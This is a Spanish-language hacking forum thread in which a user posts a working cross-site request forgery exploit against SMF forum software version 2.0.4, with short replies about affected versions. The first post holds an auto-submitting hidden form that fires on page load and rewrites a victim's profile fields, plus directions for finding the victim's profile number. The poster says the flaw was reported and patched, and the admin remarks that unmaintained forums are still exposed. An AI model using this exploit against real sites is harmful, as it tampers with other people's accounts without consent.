comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[CSRF] [SMF] Cambiar perfil

  • 5 Respuestas
  • 2007 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« en: Agosto 26, 2013, 08:12:44 pm »
Hoy os traigo un csrf en SMF.

Esto es importante, en la ultima linea:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<input type="hidden" name="u" value="94">
En value, donde pone '94' ahí que poner el numero de perfil de la victima es tan fácil como ir a tu perfil y ir cambiando el ultimo numero asta que encuentres su perfil.


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foro.com/foro/index.php?action=profile;area=forumprofile" method=post name="csrf1">
  8. <input type="hidden" name="avatar_choice" value="none">
  9. <input type="hidden" name="personal_text" value="P3K4D0R">
  10. <input type="hidden" name="bday3" value="6666">
  11. <input type="hidden" name="bday1" value="01">
  12. <input type="hidden" name="bday2" value="12">
  13. <input type="hidden" name="location" value="Mongolia">
  14. <input type="hidden" name="msn" value="xPekador@hotmail.es">
  15. <input type="hidden" name="usertitle" value="Pekador">
  16. <input type="hidden" name="signature" value="Underc0de">
  17. <input type="hidden" name="website_title" value="Underc0de">
  18. <input type="hidden" name="website_url" value="Underc0de.org">
  19. <input type="hidden" name="button_submit" value="Cambiar perfil">
  20. <input type="hidden" name="u" value="94">
  21. <body onload="envio_csrf()">

Reportado: Sí, y fixeado en todas las versiones.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5389
  • Actividad:
    38.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Agosto 26, 2013, 08:59:53 pm »
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX


Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #2 en: Agosto 26, 2013, 09:09:01 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Afectava a la 2.0.4,  pero al reportarla la fixearon a las horas y con algunas fallas mas sacaron la 2.0.5.

Ahora para verificar al aceptar usa tu pass y user encryptados en md5 si no me equivoco y se tendria que tener el user y pass, y no tendria sentido ya que tendrias la cuenta y puedes hacerlo manualmente.

- Saludos;)
« Última modificación: Agosto 26, 2013, 09:13:17 pm por xPekador »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5389
  • Actividad:
    38.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Agosto 26, 2013, 09:58:47 pm »
Genial! muchas gracias! Siempre hay foros que no actualizan por que no estan muy bien mantenidos..!

Saludos!
ANTRAX


Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« Respuesta #4 en: Agosto 26, 2013, 10:17:31 pm »
esta muy bueno amigo, muchas gracias !

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #5 en: Agosto 26, 2013, 10:42:01 pm »
Muchas gracias por comentar, mañana publicare todos los csrf de foros miarroba que tengo y son bastantes!

Saludos  ;)

 

¿Te gustó el post? COMPARTILO!



[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1844
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Ataques CSRF (Cross site request forgery)

Iniciado por M5f3r0

Respuestas: 11
Vistas: 5635
Último mensaje Septiembre 09, 2013, 03:48:08 pm
por M5f3r0
CSRF Andromeda Botnet [ POC Change Password]

Iniciado por Matabarras

Respuestas: 2
Vistas: 1817
Último mensaje Julio 30, 2013, 07:46:47 pm
por peruvianrulez
[TUTORIAL] Como crear tu csrf

Iniciado por Windero

Respuestas: 4
Vistas: 2537
Último mensaje Agosto 24, 2013, 08:09:05 am
por Réplica1
CSRF'S miarroba forums [By Pekador]

Iniciado por Réplica1

Respuestas: 1
Vistas: 1541
Último mensaje Agosto 27, 2013, 04:50:32 pm
por M5f3r0